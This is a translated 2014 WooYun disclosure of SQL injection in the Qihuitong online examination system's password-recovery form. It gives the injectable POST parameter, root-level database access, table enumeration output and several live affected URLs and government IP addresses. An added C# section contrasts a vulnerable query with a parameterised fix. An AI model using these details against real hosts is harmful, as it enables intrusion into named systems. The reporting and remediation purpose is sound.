
Vulnerability summary

Defect ID: wooyun-2014-073996

Title: SQL injection in an online examination system (no login required; several government websites affected)

Related vendor: cncert (National Internet Emergency Center, CNCERT)

Author: PythonPig

Submitted: 2014-08-27 16:21

Fixed: 2014-11-25 16:22

Published: 2014-11-25 16:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organisation (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2014-08-27: Details sent to the vendor; awaiting the vendor's handling
2014-09-01: Vendor has confirmed; details disclosed to the vendor only
2014-09-04: Details opened to third-party security partners
2014-10-26: Details disclosed to core white hats and domain experts
2014-11-05: Details disclosed to regular white hats
2014-11-15: Details disclosed to intern white hats
2014-11-25: Details disclosed to the public

Summary:

SQL injection in an online examination system (no login required; several government websites affected)

Details:

The Qihuitong (企慧通) online examination system from Shenzhen Biaochi Information Technology Co., Ltd. (深圳市标驰信息技术有限公司) has a SQL injection in the password-recovery function reached from the login page: the username field is injectable. Several government websites run this system, and quite a few companies use it as well.
0x00: First, a look at the customers who use this system

[screenshot: 客户副本.jpg (customer list)]

[screenshot: 客户1副本.jpg (customer list, continued)]


0x01: The examination system of the Zibo Food and Drug Administration (淄博市食品药品监督管理局) serves as the example. The login URL is http://222.134.129.66:800/Initial/Login.aspx. Click "Forgot password", enter any username and a well-formed e-mail address, and capture the request: the tbxName parameter is injectable. The POST request is as follows:

POST /SystemSettings/GetPassword.aspx HTTP/1.1
Host: 222.134.129.66:800
Proxy-Connection: keep-alive
Content-Length: 214
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://222.134.129.66:800
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://222.134.129.66:800/SystemSettings/GetPassword.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,de;q=0.6,en;q=0.4,zh-TW;q=0.2
__VIEWSTATE=%2FwEPDwULLTIxMDI1ODg3NTRkZNReylXAnjzPySReVFR5490Zn0Qt&__EVENTVALIDATION=%2FwEWBALigb6qCQLYjqm5AgKQoJfyDwLoqPvEByHEU498As1qKY82qpKAxVejL96y&tbxName=abc&tbxEmail=abc%40126.com&bgSubmit=%E7%A1%AE%E5%AE%9A


0x02: Basic information on the injection point; the database connection runs with root privileges in every case

[screenshot: 注入点.JPG (injection point)]


0x03: Enumerating the databases directly (cross-database access is possible)

[screenshot: databases.JPG (database list)]


0x04: Now the tables

[screenshot: tables.JPG (table list)]

I did not dump the table contents; after all, these are civil servants.
0x05: A few cases
http://edu.huiboit.com/Initial/Login.aspx
http://222.134.129.66:800/Initial/Login.aspx
http://42.120.7.132/Initial/Login.aspx
http://202.110.193.15:82/initial/login.aspx
http://www.hcrtg.com/Initial/Login.aspx

Proof of vulnerability:

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
Database: study
[71 tables]
+---------------------------------------+
| 1211zb_printinfo |
| 1211zb_printset |
| dk_config |
| dk_emailsetting |
| dk_jifeninfo |
| dk_setview |
| dk_teacherinfo |
| dk_type |
| dk_typelist |
| dk_userloginlog |
| dk_videoinfo |
| dk_videorecord |
| dk_videowareinfo |
| dk_wordinfo |
| dk_wordrecord |
| e_arrange |
| e_arrange_apply |
| e_arrange_limit |
| e_exam |
| e_exam2 |
| e_exam_sheet |
| e_examclass |
| e_sweep |
| e_sweep_exam |
| e_sweep_examclass |
| e_sweep_record |
| e_sweep_type |
| e_type |
| z_answers |
| z_answers_msg |
| z_answers_user |
| z_authorize |
| z_checkrigester |
| z_companyinfo |
| z_contact |
| z_contacttype |
| z_course |
| z_course_apply |
| z_course_assign |
| z_course_comment |
| z_course_recommend |
| z_course_type |
| z_courseware |
| z_friend |
| z_friendinvite |
| z_friendtype |
| z_keep |
| z_menus |
| z_menus_company |
| z_menus_parent |
| z_menus_role |
| z_message |
| z_message_receive |
| z_message_restore |
| z_notify |
| z_plan |
| z_require |
| z_role |
| z_section |
| z_share |
| z_student_teacher |
| z_studyrecord |
| z_sub_vote |
| z_sysadmin |
| z_sysadmin_operate |
| z_user_operate |
| z_userdetail |
| z_userinfo |
| z_userrecord |
| z_vote |
| z_vote_user |
+---------------------------------------+
Database: study_20130426
[71 tables]
+---------------------------------------+
| 1211zb_printinfo |
| 1211zb_printset |
| dk_config |
| dk_emailsetting |
| dk_jifeninfo |
| dk_setview |
| dk_teacherinfo |
| dk_type |
| dk_typelist |
| dk_userloginlog |
| dk_videoinfo |
| dk_videorecord |
| dk_videowareinfo |
| dk_wordinfo |
| dk_wordrecord |
| e_arrange |
| e_arrange_apply |
| e_arrange_limit |
| e_exam |
| e_exam2 |
| e_exam_sheet |
| e_examclass |
| e_sweep |
| e_sweep_exam |
| e_sweep_examclass |
| e_sweep_record |
| e_sweep_type |
| e_type |
| z_answers |
| z_answers_msg |
| z_answers_user |
| z_authorize |
| z_checkrigester |
| z_companyinfo |
| z_contact |
| z_contacttype |
| z_course |
| z_course_apply |
| z_course_assign |
| z_course_comment |
| z_course_recommend |
| z_course_type |
| z_courseware |
| z_friend |
| z_friendinvite |
| z_friendtype |
| z_keep |
| z_menus |
| z_menus_company |
| z_menus_parent |
| z_menus_role |
| z_message |
| z_message_receive |
| z_message_restore |
| z_notify |
| z_plan |
| z_require |
| z_role |
| z_section |
| z_share |
| z_student_teacher |
| z_studyrecord |
| z_sub_vote |
| z_sysadmin |
| z_sysadmin_operate |
| z_user_operate |
| z_userdetail |
| z_userinfo |
| z_userrecord |
| z_vote |
| z_vote_user |
+---------------------------------------+

Fix recommendation:

Filter, filter, and filter again.
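The control that actually closes an injection like the one in 0x01 is parameter binding; input filtering is defence in depth, not a replacement. The following is an added example, not code from the Qihuitong system, the vendor, or the report: a Web Forms code-behind handler for the password-recovery form showing the string-concatenated lookup that produces the defect beside its parameterised replacement. It assumes MySQL Connector/NET (the MySql.Data namespace); that the form controls are named tbxName, tbxEmail and bgSubmit as in the captured request, plus an assumed label lblMessage; that the lookup table is z_userinfo (listed in the proof above) with assumed columns username and email; and that the application connects with a least-privilege account rather than the root account the report observed.

```csharp
// Added example: not code from the Qihuitong system or from the report.
// Assumes MySQL Connector/NET (MySql.Data). Table z_userinfo comes from the
// table list in the report; column names username/email are assumptions, as are
// the lblMessage label and the exam_app database account.
using System;
using System.Text.RegularExpressions;
using MySql.Data.MySqlClient;

public partial class GetPassword : System.Web.UI.Page
{
    // Least-privilege account (assumed): the report found the app running as root.
    private const string ConnectionString =
        "server=localhost;database=study;uid=exam_app;pwd=<placeholder>";

    // VULNERABLE pattern (the defect described in 0x01): the tbxName value is
    // spliced into the SQL text, so a quote in the username lets the submitter
    // rewrite the WHERE clause. Kept here only for comparison; never call it.
    private static bool UserExistsUnsafe(MySqlConnection conn, string name, string email)
    {
        string sql = "SELECT COUNT(*) FROM z_userinfo WHERE username = '" + name +
                     "' AND email = '" + email + "'";
        using (MySqlCommand cmd = new MySqlCommand(sql, conn))
        {
            return Convert.ToInt64(cmd.ExecuteScalar()) > 0;
        }
    }

    // FIXED: values are bound as parameters. The driver sends them separately
    // from the statement text, so they can never change the query structure.
    private static bool UserExists(MySqlConnection conn, string name, string email)
    {
        const string sql =
            "SELECT COUNT(*) FROM z_userinfo WHERE username = @name AND email = @email";
        using (MySqlCommand cmd = new MySqlCommand(sql, conn))
        {
            cmd.Parameters.AddWithValue("@name", name);
            cmd.Parameters.AddWithValue("@email", email);
            return Convert.ToInt64(cmd.ExecuteScalar()) > 0;
        }
    }

    protected void bgSubmit_Click(object sender, EventArgs e)
    {
        string name = tbxName.Text.Trim();
        string email = tbxEmail.Text.Trim();

        // Defence in depth only: a length cap and a shape check on the e-mail
        // reject malformed input early. The parameter binding in UserExists is
        // what closes the injection; filtering by itself is not sufficient.
        if (name.Length == 0 || name.Length > 64 ||
            !Regex.IsMatch(email, @"^[^@\s]+@[^@\s]+\.[^@\s]+$"))
        {
            lblMessage.Text = "Invalid username or e-mail address.";
            return;
        }

        using (MySqlConnection conn = new MySqlConnection(ConnectionString))
        {
            conn.Open();
            bool found = UserExists(conn, name, email);

            // Same response either way, so the form does not reveal which
            // usernames exist.
            lblMessage.Text = "If the account exists, reset instructions have been sent.";
            if (found)
            {
                // Send the reset e-mail here (out of scope for this example).
            }
        }
    }
}
```

Binding parameters also removes the incentive to build a blacklist of quote characters, which is the kind of "filter" that tends to be bypassed; pair it with a database account that has no access to other schemas, since the report notes cross-database reads were possible with the root connection.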

Copyright notice: please credit the source when reposting: PythonPig@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-09-01 09:48

Vendor reply:

CNVD is still in the process of confirming and reproducing the described cases and the general applicability of the vulnerability. Confirmed provisionally, pending further handling.

Latest status:

None yet